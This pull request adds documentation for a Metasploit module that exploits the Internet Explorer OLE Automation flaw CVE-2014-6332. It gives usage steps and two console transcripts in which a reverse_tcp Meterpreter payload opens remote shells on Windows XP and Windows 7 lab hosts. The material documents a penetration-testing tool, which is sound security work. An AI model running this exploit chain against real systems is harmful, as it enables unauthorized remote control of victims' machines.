### PR TITLE
Add documentation for ms14_064_ole_code_execution

### DIFF
--- a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md
+++ b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md
@@ -1,10 +1,9 @@
 ## Vulnerable Application
 
-This module exploits the Windows OLE Automation array vulnerability, [CVE-2014-6332](https://www.cvedetails.com/cve/cve-2014-6332). The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 box due to the Powershell limitation. Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead.
+This module exploits the Windows OLE Automation array vulnerability, [CVE-2014-6332](https://www.cvedetails.com/cve/cve-2014-6332). The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 box. This is because from Windows 8 upward Internet Explorer blocks the payload from executing. Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead.
 
 ## Verification Steps
 
-1. Install the application
 1. Start msfconsole
 1. Do: ```use exploit/windows/browser/ms14_064_ole_code_execution```
 1. Do: ```Choose a payload and set any specific options```
@@ -22,7 +21,9 @@ Allow exploit to try Powershell. If exploiting a Windows 7 target you need to en
 
 ## Scenarios
 
-Example usage against a Windows XP Professional SP3 x86 running Internet Explorer 8.0.6001.18702. The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.207`. 
+### Windows XP Pro SP3 x86 with IE 8.0.6001.18702
+
+The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.207`. 
 
 ```
 msf > use exploit/windows/browser/ms14_064_ole_code_execution
@@ -57,7 +58,9 @@ Logged On Users : 2
 Meterpreter     : x86/windows
 ```
 
-Example usage against a Windows 7 Professional SP1 x64 running Internet Explorer 8.0.7601.17514. The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.208`. Unlike on the Windows XP, target victim will see a popup dialog apear and they will have to allow the execution of the PowerShell script for the exploit to work. You need to set `AllowPowershellPrompt` option to `true` otherwise the exploit won't work on Windows 7.
+### Windows 7 Pro SP1 x64 with IE 8.0.7601.17514
+
+The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.208`. Unlike on the Windows XP, target victim will see a popup dialog apear and they will have to allow the execution of the PowerShell script for the exploit to work. You need to set `AllowPowershellPrompt` option to `true` otherwise the exploit won't work on Windows 7.
 
 ```
 msf > use exploit/windows/browser/ms14_064_ole_code_execution

--- a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md
+++ b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md
@@ -1,0 +1,94 @@
+## Vulnerable Application
+
+This module exploits the Windows OLE Automation array vulnerability, [CVE-2014-6332](https://www.cvedetails.com/cve/cve-2014-6332). The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 box due to the Powershell limitation. Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: ```use exploit/windows/browser/ms14_064_ole_code_execution```
+1. Do: ```Choose a payload and set any specific options```
+1. Do: ```run```, after a target browses to the generated URL, you should receive a session.
+
+## Options
+
+**TRYUAC**
+
+Ask victim to start as Administrator. This option only works on Windows 7 targets.
+
+**AllowPowershellPrompt**
+
+Allow exploit to try Powershell. If exploiting a Windows 7 target you need to enable this option.
+
+## Scenarios
+
+Example usage against a Windows XP Professional SP3 x86 running Internet Explorer 8.0.6001.18702. The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.207`. 
+
+```
+msf > use exploit/windows/browser/ms14_064_ole_code_execution
+msf exploit(ms14_064_ole_code_execution) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(ms14_064_ole_code_execution) > set LHOST 192.168.2.3
+LHOST => 192.168.2.3
+msf exploit(ms14_064_ole_code_execution) > run
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 192.168.2.3:4444
+msf exploit(ms14_064_ole_code_execution) > [*] Using URL: http://0.0.0.0:8080/hGA1Ux
+[*] Local IP: http://192.168.2.3:8080/hGA1Ux
+[*] Server started.
+[*] 192.168.2.207    ms14_064_ole_code_execution - Gathering target information for 192.168.2.207
+[*] 192.168.2.207    ms14_064_ole_code_execution - Sending HTML response to 192.168.2.207
+[*] 192.168.2.207    ms14_064_ole_code_execution - Sending exploit...
+[*] 192.168.2.207    ms14_064_ole_code_execution - Sending VBS stager
+[*] Sending stage (957487 bytes) to 192.168.2.207
+[*] Meterpreter session 1 opened (192.168.2.3:4444 -> 192.168.2.207:1299) at 2017-03-01 19:07:12 +0100
+
+msf exploit(ms14_064_ole_code_execution) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : MACHINE
+OS              : Windows XP (Build 2600, Service Pack 3).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+```
+
+Example usage against a Windows 7 Professional SP1 x64 running Internet Explorer 8.0.7601.17514. The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.208`. Unlike on the Windows XP, target victim will see a popup dialog apear and they will have to allow the execution of the PowerShell script for the exploit to work. You need to set `AllowPowershellPrompt` option to `true` otherwise the exploit won't work on Windows 7.
+
+```
+msf > use exploit/windows/browser/ms14_064_ole_code_execution
+msf exploit(ms14_064_ole_code_execution) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(ms14_064_ole_code_execution) > set LHOST 192.168.2.3
+LHOST => 192.168.2.3
+msf exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true
+AllowPowershellPrompt => true
+msf exploit(ms14_064_ole_code_execution) > run
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 192.168.2.3:4444
+msf exploit(ms14_064_ole_code_execution) > [*] Using URL: http://0.0.0.0:8080/6tdgNjLVij3zs
+[*] Local IP: http://192.168.2.3:8080/6tdgNjLVij3zs
+[*] Server started.
+[*] 192.168.2.208    ms14_064_ole_code_execution - Gathering target information for 192.168.2.208
+[*] 192.168.2.208    ms14_064_ole_code_execution - Sending HTML response to 192.168.2.208
+[*] 192.168.2.208    ms14_064_ole_code_execution - Sending exploit...
+[*] Sending stage (957487 bytes) to 192.168.2.208
+[*] Meterpreter session 1 opened (192.168.2.3:4444 -> 192.168.2.208:49197) at 2017-03-01 19:35:12 +0100
+
+msf exploit(ms14_064_ole_code_execution) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WINDOWS7_X64
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+```


### PR DESCRIPTION
See issue #7139. This pull request adds module documentation for `exploit/windows/browser/ms14_064_ole_code_execution`.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/browser/ms14_064_ole_code_execution`
- [x]  `info -d`
- [x] Read the documentation, make sure everything makes sense

